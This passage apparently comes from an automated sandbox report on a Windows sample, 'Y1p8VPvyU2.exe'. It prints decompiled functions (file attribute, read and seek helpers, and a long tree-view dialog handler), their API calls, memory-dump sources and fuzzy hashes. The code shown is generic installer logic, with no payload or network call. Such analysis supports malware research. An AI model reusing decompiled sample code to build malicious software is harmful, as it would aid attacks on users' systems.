                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                      • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                      • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                      • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405602, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E00405602(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                      0x00405606
                                      0x00405613
                                      0x00405628
                                      0x0040562e

                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00405606
                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                      • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                      • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                      • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004055E3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004055E3(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                      0x004055e7
                                      0x004055f0
                                      0x00000000
                                      0x004055f9
                                      0x004055ff

                                      APIs
                                      • GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                      • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                      • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                      • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403066, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403066(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                      0x0040306a
                                      0x0040307d
                                      0x00403085
                                      0x00000000
                                      0x0040308c
                                      0x00000000
                                      0x0040308e

                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                      • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                      • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                      • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403098, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403098(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                                      0x004030a6
                                      0x004030ac

                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,000081E4), ref: 004030A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                      • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                      • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                      • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00404618, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42eb88; // 0x7203fc
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42eb70; // 0x720250
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42eb79 & 0x00000002;
							if(( *0x42eb79 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404598(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42eb78; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x429fb4;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x429fcc;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x429fb4 = _t315;
									 *0x429fcc = _t315;
									 *0x42ebc0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42eb79 & 0x00000001;
										if(( *0x42eb79 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42eb8c - _t315; // 0x4
										_v32 =  *0x429fcc;
										_t196 =  *0x42eb88; // 0x7203fc
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e33c; // 0x7278ea
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x720404
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x720414
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42eb8c; // 0x4
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x429fcc);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ebc0 = _a4;
					_t247 =  *0x42eb8c; // 0x4
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
					_v24 = _t250;
					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x429fb4 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403CDD(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403CDD(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42eb8c - _t318; // 0x4
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x429fcc + _t318 * 4) = _t274;
									_t288 =  *( *0x429fcc + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42eb8c; // 0x4
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403D12(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403D12(_v12);
								L89:
								return E00403D44(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                      0x00404636
                                      0x0040463c
                                      0x0040463e
                                      0x00404644
                                      0x0040464a
                                      0x0040464d
                                      0x00404657
                                      0x00404660
                                      0x00404663
                                      0x00404666
                                      0x0040488e
                                      0x0040488e
                                      0x00404895
                                      0x004048a9
                                      0x00404897
                                      0x00404899
                                      0x0040489c
                                      0x0040489d
                                      0x004048a4
                                      0x004048a4
                                      0x004048ac
                                      0x004048b5
                                      0x004048c0
                                      0x004048c0
                                      0x004048c3
                                      0x004048c6
                                      0x004048d5
                                      0x004048d5
                                      0x004048dc
                                      0x00404954
                                      0x00404954
                                      0x00404957
                                      0x00404959
                                      0x0040495c
                                      0x00404963
                                      0x00404971
                                      0x00404971
                                      0x00404973
                                      0x00404976
                                      0x0040497d
                                      0x0040497f
                                      0x00404983
                                      0x004049a0
                                      0x004049a4
                                      0x004049a4
                                      0x00404985
                                      0x00404992
                                      0x00404992
                                      0x00404983
                                      0x0040497d
                                      0x00000000
                                      0x00404957
                                      0x004048de
                                      0x004048e1
                                      0x004048ec
                                      0x004048ee
                                      0x004048f1
                                      0x004048f8
                                      0x004048fd
                                      0x004048ff
                                      0x00404909
                                      0x00404909
                                      0x0040490d
                                      0x0040490f
                                      0x00404912
                                      0x00404914
                                      0x00404917
                                      0x0040492d
                                      0x0040492d
                                      0x00404919
                                      0x00404919
                                      0x0040491f
                                      0x00404921
                                      0x00404928
                                      0x00404923
                                      0x00404923
                                      0x00404923
                                      0x00404921
                                      0x00404931
                                      0x00404933
                                      0x00404938
                                      0x00404941
                                      0x00404942
                                      0x0040494c
                                      0x0040494c
                                      0x0040494e
                                      0x00404951
                                      0x00404951
                                      0x00404912
                                      0x00000000
                                      0x004048ff
                                      0x004048e3
                                      0x004048e6
                                      0x004048ea
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004048ea
                                      0x004048c8
                                      0x004048cf
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004048b7
                                      0x004048b7
                                      0x004048ba
                                      0x004049a7
                                      0x004049a7
                                      0x004049ae
                                      0x00404a22
                                      0x00404a22
                                      0x00404a29
                                      0x00404a35
                                      0x00404a35
                                      0x00404a37
                                      0x00404a3e
                                      0x00404a40
                                      0x00404a45
                                      0x00404a47
                                      0x00404a4a
                                      0x00404a4a
                                      0x00404a50
                                      0x00404a55
                                      0x00404a57
                                      0x00404a5a
                                      0x00404a5a
                                      0x00404a60
                                      0x00404a66
                                      0x00404a6c
                                      0x00404a6c
                                      0x00404a72
                                      0x00404a79
                                      0x00404bc6
                                      0x00404bc6
                                      0x00404bcd
                                      0x00404bcf
                                      0x00404bd6
                                      0x00404bda
                                      0x00404be7
                                      0x00404be7
                                      0x00404bea
                                      0x00404bf0
                                      0x00404c02
                                      0x00404c02
                                      0x00404bd6
                                      0x00000000
                                      0x00404a7f
                                      0x00404a81
                                      0x00404a86
                                      0x00404a89
                                      0x00404a8d
                                      0x00404a8d
                                      0x00404a92
                                      0x00404a95
                                      0x00404ad6
                                      0x00404ad8
                                      0x00404ae2
                                      0x00404ae8
                                      0x00404aeb
                                      0x00404af0
                                      0x00404af7
                                      0x00404afa
                                      0x00404b9c
                                      0x00404ba2
                                      0x00404ba8
                                      0x00404bad
                                      0x00404bb0
                                      0x00404bc1
                                      0x00404bc1
                                      0x00000000
                                      0x00404b00
                                      0x00404b00
                                      0x00404b00
                                      0x00404b03
                                      0x00404b09
                                      0x00404b0c
                                      0x00404b0e
                                      0x00404b10
                                      0x00404b12
                                      0x00404b15
                                      0x00404b18
                                      0x00404b1f
                                      0x00404b21
                                      0x00404b24
                                      0x00404b2b
                                      0x00404b2e
                                      0x00404b2e
                                      0x00404b2e
                                      0x00404b2e
                                      0x00404b32
                                      0x00404b35
                                      0x00404b41
                                      0x00404b42
                                      0x00404b45
                                      0x00404b47
                                      0x00404b47
                                      0x00404b47
                                      0x00404b37
                                      0x00404b39
                                      0x00404b39
                                      0x00404b66
                                      0x00404b66
                                      0x00404b67
                                      0x00404b73
                                      0x00404b82
                                      0x00404b82
                                      0x00404b84
                                      0x00404b87
                                      0x00404b90
                                      0x00404b90
                                      0x00000000
                                      0x00404b03
                                      0x00404a97
                                      0x00404aa2
                                      0x00404aa5
                                      0x00404aaa
                                      0x00404aac
                                      0x00404aae
                                      0x00404ab0
                                      0x00404ac0
                                      0x00404aca
                                      0x00404acc
                                      0x00404acf
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404ab2
                                      0x00404ab2
                                      0x00404ab2
                                      0x00404ab5
                                      0x00404ab8
                                      0x00404aba
                                      0x00404aba
                                      0x00404aba
                                      0x00404abb
                                      0x00404abc
                                      0x00404abc
                                      0x00000000
                                      0x00404ab2
                                      0x00404a95
                                      0x00404a79
                                      0x004049b0
                                      0x004049b6
                                      0x00000000
                                      0x00000000
                                      0x004049c2
                                      0x004049c6
                                      0x00000000
                                      0x00000000
                                      0x004049d6
                                      0x004049d8
                                      0x004049db
                                      0x00000000
                                      0x00000000
                                      0x004049ed
                                      0x004049ef
                                      0x004049f2
                                      0x004049fc
                                      0x004049fe
                                      0x004049ff
                                      0x00404a00
                                      0x00404a0f
                                      0x00404a11
                                      0x00404a18
                                      0x00404a1b
                                      0x00000000
                                      0x00404a1b
                                      0x004049f4
                                      0x004049f7
                                      0x004049fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004049fa
                                      0x00000000
                                      0x004048ba
                                      0x0040466c
                                      0x00404671
                                      0x00404676
                                      0x0040467b
                                      0x0040467c
                                      0x00404685
                                      0x00404690
                                      0x0040469b
                                      0x004046a1
                                      0x004046af
                                      0x004046c4
                                      0x004046c9
                                      0x004046d4
                                      0x004046dd
                                      0x004046f2
                                      0x00404703
                                      0x00404710
                                      0x00404710
                                      0x00404715
                                      0x0040471b
                                      0x0040471d
                                      0x00404720
                                      0x00404725
                                      0x0040472a
                                      0x0040472c
                                      0x0040472c
                                      0x0040474c
                                      0x0040474c
                                      0x0040474e
                                      0x0040474f
                                      0x00404754
                                      0x00404757
                                      0x0040475a
                                      0x0040475e
                                      0x00404763
                                      0x00404768
                                      0x0040476c
                                      0x00404771
                                      0x00404776
                                      0x00404778
                                      0x0040477a
                                      0x00404780
                                      0x0040484a
                                      0x0040485d
                                      0x00000000
                                      0x00404786
                                      0x00404789
                                      0x0040478c
                                      0x0040478f
                                      0x0040478f
                                      0x00404795
                                      0x0040479b
                                      0x0040479e
                                      0x004047a4
                                      0x004047a5
                                      0x004047aa
                                      0x004047b3
                                      0x004047ba
                                      0x004047bd
                                      0x004047c0
                                      0x004047c3
                                      0x004047fd
                                      0x004047ff
                                      0x00404828
                                      0x00404801
                                      0x0040480e
                                      0x0040480e
                                      0x004047c5
                                      0x004047c8
                                      0x004047d7
                                      0x004047e1
                                      0x004047e9
                                      0x004047f0
                                      0x004047f8
                                      0x004047f8
                                      0x004047c3
                                      0x0040482e
                                      0x0040482f
                                      0x00404835
                                      0x0040483b
                                      0x0040483b
                                      0x00404848
                                      0x00404863
                                      0x00404867
                                      0x00404884
                                      0x00404889
                                      0x0040488c
                                      0x0040488c
                                      0x00000000
                                      0x00404869
                                      0x0040486e
                                      0x00404877
                                      0x00404c04
                                      0x00404c16
                                      0x00404c16
                                      0x00404867
                                      0x00000000
                                      0x00404848
                                      0x00404780

                                      APIs
                                      • GetDlgItem.USER32 ref: 0040462F
                                      • GetDlgItem.USER32 ref: 0040463C
                                      • GlobalAlloc.KERNEL32(00000040,00000004), ref: 00404688
                                      • LoadBitmapA.USER32 ref: 0040469B
                                      • SetWindowLongA.USER32(?,000000FC,00404C19), ref: 004046B5
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
                                      • DeleteObject.GDI32(?), ref: 00404715
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
